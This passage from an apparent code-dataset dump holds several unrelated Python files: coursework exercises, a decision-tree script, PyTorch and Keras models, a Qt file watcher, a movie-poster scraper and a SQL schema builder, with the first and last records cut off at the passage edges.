dataset[\"Class\"]) / len(dataset)) * 100\n return accuracy\n\n\n\n\n\"\"\"\n\nLoad all the data into a decision tree\n\n\"\"\"\ndef loadData(file_name,folderName=\"~\"):\n df = pd.read_csv(file_name)\n return df\n\n\nif __name__ == '__main__':\n L = int(int(sys.argv[1]))\n K = int(sys.argv[2])\n train_filename = str(sys.argv[3])\n validation_filename = str(sys.argv[4])\n test_filename = str(sys.argv[5])\n to_print = str(sys.argv[6])\n\n print(\"Information gain without pruning\\n\")\n print(\"Loading the training set for\" + train_filename)\n df = loadData(train_filename)\n print(\"Completed Loading of Training Set\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 1)\n print(\"Decision Tree creation completed \\n\")\n print(\"Loading Validation Set for\" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(df_validation, tree, default)\n print('The predictClassification accuracy on Validation is: ', accuracy, '%')\n print('\\n')\n print(\"Loading Test Set for \" + test_filename)\n dfTest = loadData(test_filename)\n print('Test Set Loading done')\n default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n default = np.unique(dfTest['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n print('The predictClassification accuracy on Test Set is: ', accuracy, '%')\n print(\"\\n\\n\\n\")\n\n if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n printDecisionTree(printDecisionTreeTree)\n print(\"\\n\\n\\n\\n\\n\\n\")\n\n print(\"Variance Gain Without Pruning\\n\")\n print(\"Loading the Training Set for \" + train_filename)\n df = loadData(train_filename)\n print(\"Training Set loading done\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 2)\n print(\"Decision Tree creation completed\\n\")\n print(\"Loading Validation Set for \" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(df_validation, tree, default)\n print('The predictClassification accuracy on Validation is: ', accuracy, '%')\n print('\\n')\n print(\"Loading Test Set for \" + test_filename)\n dfTest = loadData(test_filename)\n print('Test Set Loading done')\n default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n default = np.unique(dfTest['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n print('The predictClassification accuracy on Test Set is: ', accuracy, '%')\n print(\"\\n\\n\\n\")\n\n if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n printDecisionTree(printDecisionTreeTree)\n print(\"\\n\\n\\n\\n\\n\\n\")\n\n print(\"Information Gain with pruning\\n\")\n print('Using L=' + str(L) + \" K=\" + str(K))\n print(\"Loading Training Set for \" + train_filename)\n df = loadData(train_filename)\n print(\"Training Set loading done\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 1)\n print(\"Decision Tree creation completed \\n\")\n print(\"Loading Validation Set for \" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n print(\"Pruning Begins\")\n tree = runPostPruning(L, K, tree, df_validation, default)\n print('Pruning Completed')\n dfTest = loadData(test_filename)\n default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n default = np.unique(dfTest['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n print('The predictClassification accuracy is: ', accuracy, '%')\n\n if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n printDecisionTree(printDecisionTreeTree)\n print(\"\\n\\n\\n\\n\\n\\n\")\n\n print(\"Variance Gain with pruning\\n\")\n print('Using L=' + str(L) + \" K=\" + str(K))\n print(\"Loading Training Set for \" + train_filename)\n df = loadData(train_filename)\n print(\"Training Set loading done\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 2)\n print(\"Decision Tree creation completed \\n\")\n print(\"Loading Validation Set for \" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n print(\"Pruning Begins\")\n tree = runPostPruning(L, K, tree, df_validation, default)\n print('Pruning Completed')\n dfTest = loadData(test_filename)\n default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n default = np.unique(dfTest['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n print('The predictClassification accuracy is: ', accuracy, '%')\n\n if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n printDecisionTree(printDecisionTreeTree)\n print(\"\\n\\n\\n\\n\\n\\n\")\n","sub_path":"Assignment 1/data_sets1/DecisionTreemod1.py","file_name":"DecisionTreemod1.py","file_ext":"py","file_size_in_byte":13767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359719081","text":"def sumaDigitos(nro):\r\n '''Suma los digitos pares de un numero.\r\n Utiliza continue cuando el digito es impar'''\r\n suma = 0\r\n while nro > 0:\r\n digito = nro % 10\r\n nro = nro // 10\r\n if digito % 2 != 0:\r\n continue #deja de ejecutar la presente iteración, pasa a la siguiente.\r\n suma = suma + digito\r\n return suma\r\n\r\ndef main():\r\n n = int(input(\"Ingrese un numero: \"))\r\n print(f\"La suma de sus digitos pares es: {sumaDigitos(n)}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n ","sub_path":"Practica 5/Notas/ejemplo_continue1.py","file_name":"ejemplo_continue1.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186156987","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom better_nilm.model.architecture._base import TorchModel\n\n\"\"\"\nSource: https://github.com/lmssdd/TPNILM\nCheck the paper\nNon-Intrusive Load Disaggregation by Convolutional\nNeural Network and Multilabel Classification\nby Luca Massidda, Marino Marrocu and Simone Manca\n\"\"\"\n\n\nclass _Encoder(nn.Module):\n def __init__(self, in_features=3, out_features=1, kernel_size=3, padding=1,\n stride=1, dropout=0.1):\n super(_Encoder, self).__init__()\n self.conv = nn.Conv1d(in_features, out_features,\n kernel_size=kernel_size, padding=padding,\n stride=stride, bias=False)\n self.bn = nn.BatchNorm1d(out_features)\n self.drop = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.drop(self.bn(F.relu(self.conv(x))))\n\n\nclass _TemporalPooling(nn.Module):\n def __init__(self, in_features=3, out_features=1, kernel_size=2,\n dropout=0.1):\n super(_TemporalPooling, self).__init__()\n self.kernel_size = kernel_size\n self.pool = nn.AvgPool1d(kernel_size=self.kernel_size,\n stride=self.kernel_size)\n self.conv = nn.Conv1d(in_features, out_features, kernel_size=1,\n padding=0)\n self.bn = nn.BatchNorm1d(out_features)\n self.drop = nn.Dropout(dropout)\n\n def forward(self, x):\n x = self.pool(x)\n x = self.conv(x)\n x = self.bn(F.relu(x))\n x = self.drop(F.interpolate(x, scale_factor=self.kernel_size,\n mode='linear', align_corners=True))\n return x\n\n\nclass _Decoder(nn.Module):\n def __init__(self, in_features=3, out_features=1, kernel_size=2, stride=2):\n super(_Decoder, self).__init__()\n self.conv = nn.ConvTranspose1d(in_features, out_features,\n kernel_size=kernel_size, stride=stride,\n bias=False)\n self.bn = nn.BatchNorm1d(out_features)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass _PTPNet(nn.Module):\n\n def __init__(self, output_len=480, out_channels=1,\n init_features=32, dropout=0.1):\n super(_PTPNet, self).__init__()\n\n p = 2\n k = 1\n features = init_features\n self.encoder1 = _Encoder(1, features, kernel_size=3,\n padding=0, dropout=dropout)\n # (batch, input_len - 2, 32)\n self.pool1 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n self.encoder2 = _Encoder(features * 1 ** k, features * 2 ** k,\n kernel_size=3, padding=0, dropout=dropout)\n # (batch, [input_len - 6] / 2, 64)\n self.pool2 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n self.encoder3 = _Encoder(features * 2 ** k, features * 4 ** k,\n kernel_size=3, padding=0, dropout=dropout)\n # (batch, [input_len - 12] / 4, 128)\n self.pool3 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n self.encoder4 = _Encoder(features * 4 ** k, features * 8 ** k,\n kernel_size=3, padding=0, dropout=dropout)\n # (batch, [input_len - 30] / 8, 256)\n\n # Compute the output size of the encoder4 layer\n # (batch, S, 256)\n s = output_len / 8\n\n self.tpool1 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 12),\n dropout=dropout)\n self.tpool2 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 6), dropout=dropout)\n self.tpool3 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 3), dropout=dropout)\n self.tpool4 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 2), dropout=dropout)\n\n self.decoder = _Decoder(2 * features * 8 ** k, features * 1 ** k,\n kernel_size=p ** 3, stride=p ** 3)\n\n self.activation = nn.Conv1d(features * 1 ** k, out_channels,\n kernel_size=1, padding=0)\n\n self.power = nn.Conv1d(features * 1 ** k, out_channels,\n kernel_size=1, padding=0)\n\n def forward(self, x):\n enc1 = self.encoder1(x)\n enc2 = self.encoder2(self.pool1(enc1))\n enc3 = self.encoder3(self.pool2(enc2))\n enc4 = self.encoder4(self.pool3(enc3))\n\n tp1 = self.tpool1(enc4)\n tp2 = self.tpool2(enc4)\n tp3 = self.tpool3(enc4)\n tp4 = self.tpool4(enc4)\n\n dec = self.decoder(torch.cat([enc4, tp1, tp2, tp3, tp4], dim=1))\n\n pw = self.power(dec)\n act = self.activation(F.relu(dec))\n\n return pw, act\n\n\nclass ConvModel(TorchModel):\n\n def __init__(self, output_len=480, border=16, out_channels=1,\n init_features=32,\n learning_rate=0.001, dropout=0.1,\n classification_w=1, regression_w=0):\n super(TorchModel, self).__init__()\n\n # The time series will undergo three convolutions + poolings\n # This will give a series of size (batch, S, 256)\n # Where S = output_len / 8\n # That series will them pass by four different filters\n # The output of the four filters must have the same size\n # For this reason, S must be a multiple of 12\n if output_len % 96 != 0:\n s = round(output_len / 96)\n raise ValueError(f\"output_len {output_len} is not valid.\\nClosest\"\n f\" valid value is {96 * s}\")\n\n self.border = border\n\n self.model = _PTPNet(output_len=output_len,\n out_channels=out_channels,\n init_features=init_features,\n dropout=dropout).cuda()\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=learning_rate)\n self.pow_criterion = nn.MSELoss()\n self.act_criterion = nn.BCEWithLogitsLoss()\n self.pow_w = regression_w\n self.act_w = classification_w\n self.pow_loss_avg = 0.0045\n self.act_loss_avg = 0.68\n","sub_path":"better_nilm/model/architecture/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519156728","text":"import os\nimport sys\nif '/opt' not in sys.path:\n\tsys.path.append('/opt') # Required for AWS Lambda to find the dependencies layer's psycopg2\n\nAPP_NAME = os.environ.get('app', 'myCookbook')\nSTACK = os.environ.get('stack', 'dev')\nassert STACK\n\n# Pagination\nPER_PAGE = 25\nDEFAULT_PAGE = 1","sub_path":"backend/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143069322","text":"\"\"\"\nBased on the fact that visual perceptors are more sensitive on changes in luminosity than in colour.\nFrom content and style image we extract luminosity characteristics.\n\nIn most cases, computationally less expensive than color histogram matching.\nIf the process of histogram matching is more complicated it can be less effective than color histogram matching.\n\"\"\"\n\nimport numpy as np\nimport cv2\nfrom utils import mean_std_dev\n\nCONTENT_IMAGE_NAME = \"blagaj.jpg\"\nSTYLE_IMAGE_NAME = \"StarryNightOverTheRoneVanGogh.jpg\"\n\nLOGARITHMIC_COLOR_SPACE = cv2.COLOR_BGR2LAB\nRGB_COLOR_SPACE = cv2.COLOR_LAB2BGR\n\n\nclass LuminanceOnlyTransfer(object):\n def __init__(self):\n print(\"LuminanceOnlyTransfer initialized.\")\n\n @staticmethod\n def open_image_in_log_space(image_path):\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, LOGARITHMIC_COLOR_SPACE)\n return image\n\n @staticmethod\n def match(style_image_path, content_image_path):\n style_image = LuminanceOnlyTransfer.open_image_in_log_space(style_image_path)\n s_height, s_width, s_depth = style_image.shape\n content_image = LuminanceOnlyTransfer.open_image_in_log_space(content_image_path)\n\n mu_s, sigma_s = mean_std_dev(style_image)\n mu_c, sigma_c = mean_std_dev(content_image)\n\n for h in range(0, s_height):\n for w in range(0, s_width):\n for d in range(0, s_depth):\n \"\"\"\n Each luminance pixel is updated with formula:\n Ls' = (sigma_c / sigma_s) * (Ls - mu_s) + mu_c\n \"\"\"\n luminance_pixel = style_image[h, w, d]\n luminance_pixel = (sigma_c[d] / sigma_s[d]) * \\\n (luminance_pixel - mu_s[d]) + mu_c[d]\n\n if luminance_pixel < 0:\n luminance_pixel = 0\n if luminance_pixel > 255:\n luminance_pixel = 255\n\n style_image[h, w, d] = luminance_pixel\n\n style_image = cv2.cvtColor(style_image, RGB_COLOR_SPACE)\n cv2.imwrite(\"../images/results/LOT_\" + STYLE_IMAGE_NAME, style_image)\n\n return style_image\n\n\nLuminanceOnlyTransfer.match(\"../images/style/\" + STYLE_IMAGE_NAME, \"../images/content/\" + CONTENT_IMAGE_NAME)\n","sub_path":"colorPreservationModel/luminance_only_transfer.py","file_name":"luminance_only_transfer.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427340406","text":"#!/usr/bin/python3\n\n'''\nFilesytem watcher example\n'''\n\nimport sys\nfrom PyQt4 import QtCore, QtGui\nimport signal\n\nimport time\nimport threading\nimport random\n\n\ndef onFileSystemChanged(path):\n print (\"Changed signal for \" + path)\n ct = threading.current_thread()\n print (\"Received in \" + str(ct))\n print (\"Some action in thread could be started\")\n t = threading.Thread(target = hello_thread, args = (path,))\n t.start()\n\ndef hello_thread(in_text):\n ct = threading.current_thread()\n st = random.uniform(1.0, 5.0)\n time.sleep(st)\n text = \"Hello from \" + str(ct) + \" at time \" + time.ctime() + \" with \" + in_text\n print(text) \n \ndef main():\n app = QtGui.QApplication(sys.argv)\n \n qfsw = QtCore.QFileSystemWatcher()\n qfsw.addPath(\"test.txt\")\n QtCore.QObject.connect(qfsw,QtCore.SIGNAL(\"directoryChanged(QString)\"),onFileSystemChanged)\n QtCore.QObject.connect(qfsw,QtCore.SIGNAL(\"fileChanged(QString)\"),onFileSystemChanged)\n \n # /\\\n # ||--- These are different signals!\n # \\/\n \n # Enable Ctrl + C to terminate\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n # Qt Main loop\n sys.exit(app.exec())\n \nif __name__ == \"__main__\":\n main()","sub_path":"python/nsn-201211/qtfswatch.py","file_name":"qtfswatch.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"428897962","text":"#!/bin/bash/env python\n# -*- coding: utf-8 -*-\nt = [-10, -8, 0, 1, 2, 5, -2, -4]\nminimo = t[0]\nmaximo = t[0]\nsoma = 0\n\nfor e in t:\n if e < minimo:\n minimo = e\n\n if e > maximo:\n maximo = e\n\n soma += e\n\nprint(\"Minimo %d, Máximo %d, Média %5.2f\" % (minimo, maximo, (soma / len(t))))\n","sub_path":"algorithms/programming_introduction_with_python/chapter6/exercises/6.13/6_13.py","file_name":"6_13.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562022231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 4 20:58:48 2017\n\n@author: Rober\n\"\"\"\n\n\"\"\"\nCreated on Tue Apr 4 11:08:35 2017\n\n@author: goodfellow\n\"\"\"\nimport numpy as np\nimport csv\nimport cv2\nimport sklearn\nfrom sklearn.model_selection import train_test_split\n\nsamples = []\nwith open('./data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n next(reader, None) # skip the headers\n for line in reader:\n samples.append(line)\n\nprint('Readed CSV file')\n \nprint('Splitting DS..')\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\ndef test_generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n center_angle = float(batch_sample[3])\n # Only high steering values\n if abs(center_angle)>0.85:\n source_path = batch_sample[0]\n filename = source_path.split('/')[-1]\n current_path = './data/IMG/' + filename\n center_image = cv2.imread(current_path)\n images.append(center_image)\n angles.append(center_angle)\n images.append(cv2.flip(current_path, 1))\n angles.append(center_angle * -1.0)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n print(train_generator[0].shape)\n print(validation_generator[1].shape)\n return (X_train, y_train)\n\ntest_generator(samples) \n\n \ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n center_angle = float(batch_sample[3])\n # Only high steering values\n if abs(center_angle)>0.85:\n source_path = batch_sample[0]\n filename = source_path.split('/')[-1]\n current_path = './data/IMG/' + filename\n center_image = cv2.imread(current_path)\n images.append(center_image)\n angles.append(center_angle)\n images.append(cv2.flip(current_path, 1))\n angles.append(center_angle * -1.0)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n #print(train_generator[0].shape)\n #print(validation_generator[1].shape)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n\n\n#Model\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Lambda, Cropping2D\nfrom keras.layers import Conv2D\n#from keras import losses\n\n#Init Variables\nbatch_size = 32\nepochs = 10\n# input image dimensions\nimg_rows, img_cols = 160, 320\ninput_shape = (img_rows, img_cols, 3)\n###############################################\n# compile and train the model using the generator function\nprint('Creating Genartors...')\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n#Check shapes\n\n###############################################\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \nmodel.add(Lambda(lambda x: x/127.5 - 1., input_shape=input_shape))\nmodel.add(Cropping2D(cropping=((50,20), (0,0))))\nmodel.add(Conv2D(24, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(36, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(48, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='valid', activation='relu'))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='valid', activation='relu'))\n#Flatten\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\n#Output\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n#LOAD PRETRAINED MODEL\npretrained_model = False\nif pretrained_model:\n print('Loading Pretrained model')\n model.load_weights('./cp/model-p3-v06.h5')\n\n\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\ncheckpointer = ModelCheckpoint(filepath=\"./cp/model-p3-v06.h5\", verbose=1, save_best_only=True,\n monitor='val_loss', save_weights_only=False, mode='auto')\n\nearlystopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=2, verbose=1, mode='auto')\n\n\nmodel.compile(loss='mse', \n optimizer=keras.optimizers.Adam(), \n metrics=None, \n sample_weight_mode=None)\n\nhistory_object = model.fit_generator(\n train_generator,\n samples_per_epoch=len(train_samples),\n nb_epoch=epochs,\n validation_data=validation_generator,\n nb_val_samples=len(validation_samples),\n callbacks=[checkpointer,earlystopping],\n verbose=1)\n\n##############################################################\nimport matplotlib.pyplot as plt\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"backup/train_Rober_v07.py","file_name":"train_Rober_v07.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50146294","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\n\n\ndef count_th(word):\n # base case: no letter pairs left to iterate over\n if not word[:2]:\n return 0\n # getting closer to base case: iterate over letter pairs\n else:\n # if 'th' is in first two letters, return 1\n # and recurse on the rest of the word\n if word[:2] == 'th':\n return 1 + count_th(word[1:])\n else:\n return count_th(word[1:])\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"654346347","text":"from bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nimport requests\nfrom pathlib import Path\n\nurl = \"https://movie.naver.com/movie/running/current.nhn\"\nres = requests.get(url)\nres.raise_for_status()\nsoup = bs(res.text, 'lxml')\n# pprint(soup)\n# hrefL = [div.a[\"href\"] for div in divL]\n# codeL = [href.split(\"=\")[1] for href in hrefL]\n# for href in hrefL:\n# pprint(href.split(\"=\")[1])\ndtL = soup.find_all(\"dt\",attrs={\"class\",\"tit\"})\nurlL = {dt.a[\"href\"].split(\"=\")[1]:dt.a.get_text() for dt in dtL}\nimgsrcL = []\n# pprint(urlL)\nfor url, name in urlL.items():\n res2 = requests.get(\"https://movie.naver.com/movie/bi/mi/photoViewPopup.nhn?movieCode=\"+url)\n pprint(\"https://movie.naver.com/movie/bi/mi/photoViewPopup.nhn?movieCode=\"+url+\" \"+name)\n soup2 = bs(res2.text, \"lxml\")\n imgsrc = soup2.find(\"img\")['src']\n imgsrcL.append(imgsrc+name)\n # res3 = requests.get(imgsrc)\n # Path(\"./img/movie_poster\").mkdir(parents=True,exist_ok=True)\n # with open(\"./img/movie_poster/\"+name+\".jpg\",'wb') as f:\n # f.write(res3.content)\n # idx += 1\n # with open(\"./img/movie_poster/movie{}.jpg\".format(idx),'wb') as f:\n # f.write(res3.content)\npprint(imgsrcL)","sub_path":"W6D4/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95249125","text":"from useless.sqlgen.classes import Table, Sequence, ColumnType, Column\nfrom useless.sqlgen.defaults import Pk, Text, DefaultNamed, Bool, PkNum\nfrom useless.sqlgen.defaults import PkBigname, Bigname, Name, Num, PkName\nfrom useless.sqlgen.defaults import DateTime\nfrom useless.sqlgen.statement import Statement\nfrom useless.sqlgen.admin import grant_public, grant_group\n\n\nZipName = ColumnType('varchar', 5)\nStateName = ColumnType('varchar', 2)\nsequences = ['address_ident', 'contact_ident', 'ticket_ident',\n 'location_ident', 'client_ident', 'action_ident', 'task_ident']\n\ndef AutoId(name, seqname, pk=False):\n column = Num(name)\n c = column.constraint\n c.unique = True\n c.null = False\n c.pk = pk\n column.set_auto_increment(seqname)\n return column\n\ndef Now(name):\n column = DateTime(name)\n column.constraint.default_raw = True\n column.constraint.default = 'now()'\n return column\n\nclass ConfigTable(Table):\n def __init__(self):\n uname = PkName('username')\n section = PkName('section')\n option = PkBigname('option')\n value = Text('value')\n cols = [uname, section, option, value]\n Table.__init__(self, 'config', cols)\n \nclass AddressTable(Table):\n def __init__(self):\n idcol = AutoId('addressid', 'address_ident')\n s1 = PkBigname('street1')\n s2 = PkBigname('street2')\n s2.constraint.default = ('')\n city = PkName('city')\n state = Column('state', StateName)\n state.constraint.pk = True\n zip_ = Column('zip', ZipName)\n zip_.constraint.pk = True\n cols = [idcol, s1, s2, city, state, zip_]\n Table.__init__(self, 'addresses', cols)\n\nclass ContactTable(Table):\n def __init__(self):\n idcol = AutoId('contactid', 'contact_ident')\n name = PkName('name')\n address = Num('addressid')\n address.set_fk('addresses', 'addressid')\n email = PkBigname('email')\n desc = Text('description')\n Table.__init__(self, 'contacts', [idcol, name, address, email, desc])\n\nclass TicketTable(Table):\n def __init__(self):\n idcol = AutoId('ticketid', 'ticket_ident', pk=True)\n title = Name('title')\n title.constraint.null = False\n author = Name('author')\n created = Now('created')\n data = Text('data')\n cols = [idcol, title, author, created, data]\n Table.__init__(self, 'tickets', cols)\n \nclass TicketActionTable(Table):\n def __init__(self):\n ticket = Num('ticketid')\n ticket.set_fk('tickets')\n actionid = AutoId('actionid', 'action_ident', pk=True)\n subject = Bigname('subject')\n action = Name('action')\n author = Name('author')\n posted = Now('posted')\n data = Text('data')\n cols = [ticket, actionid, subject, action, author, posted, data]\n Table.__init__(self, 'ticketactions', cols)\n \nclass TicketActionParentTable(Table):\n def __init__(self):\n actionid = PkNum('actionid')\n actionid.set_fk('ticketactions', 'actionid')\n parent = PkNum('parent')\n parent.set_fk('ticketactions')\n Table.__init__(self, 'ticketactionparent', [actionid, parent])\n \nclass TicketStatusTable(Table):\n def __init__(self):\n ticketid = PkNum('ticketid')\n ticketid.set_fk('tickets')\n status = Name('status')\n Table.__init__(self, 'ticketstatus', [ticketid, status])\n\nclass LocationTable(Table):\n def __init__(self):\n idcol = AutoId('locationid', 'location_ident')\n name = PkName('name')\n name.constraint.default = 'main office'\n addressid = PkNum('addressid')\n addressid.set_fk('addresses', 'addressid')\n isp = PkName('isp')\n conn = PkName('connection')\n ip = PkName('ip')\n static = Bool('static')\n static.constraint.pk = True\n serviced = Bool('serviced')\n serviced.constraint.pk = True\n cols = [idcol, name, addressid, isp, conn, ip, static, serviced]\n Table.__init__(self, 'locations', cols)\n \nclass ClientTable(Table):\n def __init__(self):\n idcol = PkNum('clientid')\n idcol.set_auto_increment('client_ident')\n client = Name('client')\n client.constraint.unique = True\n Table.__init__(self, 'clients', [idcol, client])\n \nclass ClientTicketTable(Table):\n def __init__(self):\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n ticketid = PkNum('ticketid')\n ticketid.set_fk('tickets')\n status = Name('status')\n Table.__init__(self, 'client_tickets', [clientid, ticketid, status])\n \nclass ClientInfoTable(Table):\n def __init__(self):\n clientid = Num('clientid')\n clientid.set_fk('clients')\n locationid = Num('locationid')\n locationid.set_fk('locations', 'locationid')\n contactid = Num('contactid')\n contactid.set_fk('contacts', 'contactid')\n cols = [clientid, locationid, contactid]\n Table.__init__(self, 'clientinfo', cols)\n \nclass ClientDataTable(Table):\n def __init__(self):\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n name = PkName('name')\n value = Text('value')\n cols = [clientid, name, value]\n Table.__init__(self, 'clientdata', cols)\n\nclass TaskTable(Table):\n def __init__(self):\n taskid = PkNum('taskid')\n taskid.set_auto_increment('task_ident')\n name = Name('name')\n desc = Text('description')\n cols = [taskid, name, desc]\n Table.__init__(self, 'tasks', cols)\n\nclass ClientTaskTable(Table):\n def __init__(self):\n taskid = PkNum('taskid')\n taskid.set_fk('tasks')\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n Table.__init__(self, 'clienttask', [taskid, clientid])\n\nclass LocationTaskTable(Table):\n def __init__(self):\n taskid = PkNum('taskid')\n taskid.set_fk('tasks')\n locationid = PkNum('locationid')\n locationid.set_fk('locations', 'locationid')\n Table.__init__(self, 'locationtask', [taskid, locationid])\n \n \nMAINTABLES = [AddressTable, ContactTable, TicketTable,\n TicketStatusTable, TicketActionTable, TicketActionParentTable,\n LocationTable, ClientTable, ClientTicketTable, ClientInfoTable,\n ClientDataTable, TaskTable, ClientTaskTable, LocationTaskTable\n ]\n\ndef create_schema(cursor, group):\n newseqs = [s for s in sequences if s not in cursor.sequences()]\n for s in newseqs:\n cursor.create_sequence(Sequence(s))\n for t in MAINTABLES:\n cursor.create_table(t())\n\n tables = [t().name for t in MAINTABLES]\n full = [ClientInfoTable, ClientTicketTable, ClientTaskTable, LocationTaskTable]\n insup = [AddressTable, ContactTable, TicketStatusTable,\n LocationTable, ClientTable, TaskTable]\n ins = [TicketTable, TicketActionTable, TicketActionParentTable]\n\n execute = cursor.execute\n execute(grant_public(tables))\n execute(grant_group('ALL', sequences, group))\n execute(grant_group('ALL', [t().name for t in full], group))\n execute(grant_group('INSERT', [t().name for t in ins + insup], group))\n execute(grant_group('UPDATE', [t().name for t in 